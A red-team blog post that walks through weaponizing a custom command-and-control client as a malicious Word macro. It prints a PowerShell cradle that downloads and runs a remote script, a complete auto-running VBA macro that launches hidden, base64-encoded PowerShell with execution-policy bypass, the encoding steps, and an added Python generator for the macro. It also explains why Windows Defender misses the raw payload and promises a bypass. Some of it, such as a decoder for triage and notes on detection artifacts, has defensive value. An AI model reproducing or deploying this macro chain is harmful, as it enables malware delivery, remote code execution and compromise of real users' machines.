Showcasing Red Teaming TTPs — Weaponizing Custom Made C2 Channel via MS Word Macro

Lsec, published in System Weakness, Jul 10, 2022

Welcome back my fellow hackers, today we are continuing the series of showcasing Red Teaming TTPs by trying to weaponize the custom C2 channel we previously wrote. The video about building that C2 is here: https://youtu.be/Yoj0bQkIRqU

I also wrote a blog post on it: Creating Reverse C2 Channel with C# Powershell and Python | by Lsec | May, 2022 | Medium

The video version of this post is on my YouTube channel: https://youtu.be/pGRGxx2AO3A

Enough links, let’s get into action!

Slowly building up

I assume that you have already read about the technology and the idea behind our custom C2; now we take it a step further. My idea is to embed it into a Word document as a malicious macro. This can be done in several ways, and, as you will see, the classical approach failed to evade Windows Defender.

First, let's test the raw payload to see it in action.

By remotely loading the client.ps1 file we successfully triggered the callback on both Commando VM and a Windows 10 box with Defender turned on.

The one-liner I used to load client.ps1 was:

powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.126.128/client.ps1')"

[Screenshot: successful execution on Commando VM]
[Screenshot: successful execution on Windows 10 with Defender on]

Why is this not getting caught?

The raw payload is not caught because, as far as Windows Defender can tell, we are just compiling and running ordinary C# code. A little more theory:

The whole body of client.ps1 is one large variable holding C# source, which the script compiles and runs. That code is not malicious on its own: it executes a local command that it reads from a local variable, and that variable happens to be filled by the remote callback. If you wrote a C# project that executes a command, Defender would not trigger either, because that is not malicious activity in itself. We abuse it by supplying whatever command we want remotely, which gives us a session that lasts for the duration of each executed command. Defender's AV engine is mainly looking for shellcode or executables that match known signatures, and nothing here matches. Keep in mind that with this technique we are NOT operating purely in memory: every time the C# source is compiled, temporary files are written to disk (compiling C# from Windows PowerShell with Add-Type goes through csc.exe, which writes its intermediate files to the user's temp directory). That was still enough to get past Defender in my tests, but powershell.exe spawning csc.exe is an obvious artifact for an EDR or a hunting query, so do not treat the callback as invisible.

Weaponization Part.

Now let's talk about its weaponization. The idea is to embed it into a Word macro. Following the classical approach, my macro was:

Sub BonusMacro()
    Shell ("powershell -exec bypass -nop -w hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxADIANgAuADEAMgA4AC8AYwBsAGkAZQBuAHQALgBwAHMAMQAnACkA")
End Sub

Sub AutoOpen()
    BonusMacro
End Sub

Sub Document_Open()
    BonusMacro
End Sub

Let’s break it down.

The main macro procedure is BonusMacro. It does only one thing: it runs a Base64-encoded PowerShell script with a hidden window (-w hidden). Shell starts PowerShell as its own process, so our PowerShell process keeps running even if the user closes the Word document, and -w hidden means no console window ever appears, which reduces the chances of the user noticing.

Why Base64? Because the encoded form contains no quotes, parentheses or other special characters, so the command survives being wrapped in a VBA string literal without any escaping headaches.

To Base64-encode a command I followed this example (the bytes must be UTF-16LE, which .NET calls Unicode, because that is what -EncodedCommand expects):

$cmd = "IEX(New-Object Net.WebClient).DownloadString('http://192.168.126.128/client.ps1')"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)   # UTF-16LE bytes of the command
$EncodedText = [Convert]::ToBase64String($Bytes)          # the value that follows -e / -EncodedCommand
$EncodedText

The other two procedures, AutoOpen and Document_Open, run BonusMacro automatically whenever the document is opened (after the user has clicked Enable Content, of course).
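The encoding step and the macro above, as an added example that is not part of the original post: a small Python helper that produces the -EncodedCommand form of a command the same way the PowerShell snippet does, emits the same three-procedure macro, and, for the triage side, pulls an encoded launcher back out of macro text and decodes it. The command string and the 192.168.126.128 address are the post's own lab values; the function names are mine.

```python
import base64
import re
from typing import Optional

# The post's launcher one-liner; the IP and path belong to the author's lab, not a real host.
COMMAND = "IEX(New-Object Net.WebClient).DownloadString('http://192.168.126.128/client.ps1')"


def encode_powershell(cmd: str) -> str:
    """Produce the argument for powershell.exe -EncodedCommand (-e).

    PowerShell expects base64 over the UTF-16LE bytes of the script, which is
    why the post's encoder uses [System.Text.Encoding]::Unicode, not UTF-8.
    """
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def decode_powershell(encoded: str) -> str:
    """Reverse of encode_powershell; handy when triaging a recovered macro."""
    return base64.b64decode(encoded).decode("utf-16-le")


def build_macro(cmd: str, macro_name: str = "BonusMacro") -> str:
    """Emit the same three-procedure VBA macro the post uses, with cmd encoded.

    The base64 alphabet has no double quote, so the launcher can sit inside
    the VBA string literal without any escaping.
    """
    encoded = encode_powershell(cmd)
    assert '"' not in encoded  # guaranteed by the base64 alphabet
    launcher = f"powershell -exec bypass -nop -w hidden -e {encoded}"
    return "\n".join([
        f"Sub {macro_name}()",
        f'    Shell ("{launcher}")',
        "End Sub",
        "",
        "Sub AutoOpen()",
        f"    {macro_name}",
        "End Sub",
        "",
        "Sub Document_Open()",
        f"    {macro_name}",
        "End Sub",
    ])


# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
# Whitespace is required after the switch so "-exec bypass" is not mistaken for "-e xec".
_ENCODED_SWITCH = re.compile(
    r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)


def extract_command(macro_text: str) -> Optional[str]:
    """Find an -EncodedCommand argument in macro text and decode it.

    Returns None when the macro carries no encoded PowerShell launcher.
    """
    match = _ENCODED_SWITCH.search(macro_text)
    return decode_powershell(match.group(1)) if match else None


if __name__ == "__main__":
    macro = build_macro(COMMAND)
    print(macro)
    print("\nDecoded back from the macro:", extract_command(macro))
```

Running the script prints the macro with exactly the base64 string shown above; feeding that macro text back through extract_command recovers the original DownloadString one-liner, which is the first thing to do when a suspicious document with an encoded launcher lands on your desk.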

What happened?

Following the classical approach, Windows Defender caught our malicious Word document straight away. Let's try to understand why.

In my testing, Defender flags a macro as malicious as soon as it sees Shell() launching powershell, regardless of what the encoded command actually does. Keep in mind that the raw payload worked perfectly, so the problem is the delivery, not the C2 itself; we must find a better way to weaponize it.

What now?

From here on we have plenty of options: obfuscate the macro, or take a different route to launching the payload altogether.

What is the moral of the story?

Defensive technology has moved on and the classical attack methods no longer work. To bypass AV we must think outside the box and try something new. Testing is the key: a lot of thinking is required, but every theory has to be backed up by plenty of testing.

In the next video (and blog post) I will show how to bypass Defender using the same attack method (an MS Word macro, client-side attack). Stay tuned to my channel and happy hacking.

DISCLAIMER: I AM NOT RESPONSIBLE FOR THE ACTIONS YOU TAKE WITH THE CUSTOM MADE C2 CHANNEL!!!
